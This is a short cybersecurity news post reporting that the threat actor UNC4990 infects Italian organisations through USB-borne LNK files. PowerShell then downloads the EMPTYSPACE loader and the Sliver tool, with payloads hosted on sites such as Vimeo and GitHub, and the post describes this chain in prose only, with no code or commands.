A financially motivated threat actor, known as UNC4990, is employing weaponized USB devices as an initial method of infecting organizations in Italy, targeting industries such as health, transportation, construction, and logistics. The attacks involve widespread USB infection, followed by the deployment of the EMPTYSPACE downloader.
This downloader is used to drop the open-source Sliver adversary simulation tool. UNC4990, operational since late 2020, utilizes Italian infrastructure for command-and-control (C2) purposes. While the end goal and whether UNC4990 acts as an initial access facilitator for other threat actors remain unclear, there have been instances where an open-source cryptocurrency miner was deployed after months of beaconing activity. The attacks were first documented by Fortgale and Yoroi in December 2023, with the former tracking the adversary under the name Nebula Broker.
The infection begins when a victim double-clicks on a malicious LNK shortcut file on a removable USB device, leading to the execution of a PowerShell script responsible for downloading EMPTYSPACE (also known as BrokerLoader or Vetta Loader) from a remote server via an intermediate PowerShell script hosted on Vimeo.
This malicious campaign has broader implications, as it showcases a threat actor's ability to exploit trusted third-party websites like GitHub, Vimeo, and Ars Technica to host encoded payloads. The cybersecurity community is concerned about the adaptability and experimentation demonstrated by UNC4990 through the use of different programming languages in developing their toolset, highlighting the need for enhanced security measures and vigilance in addressing such sophisticated threats.
0 comments:
Post a Comment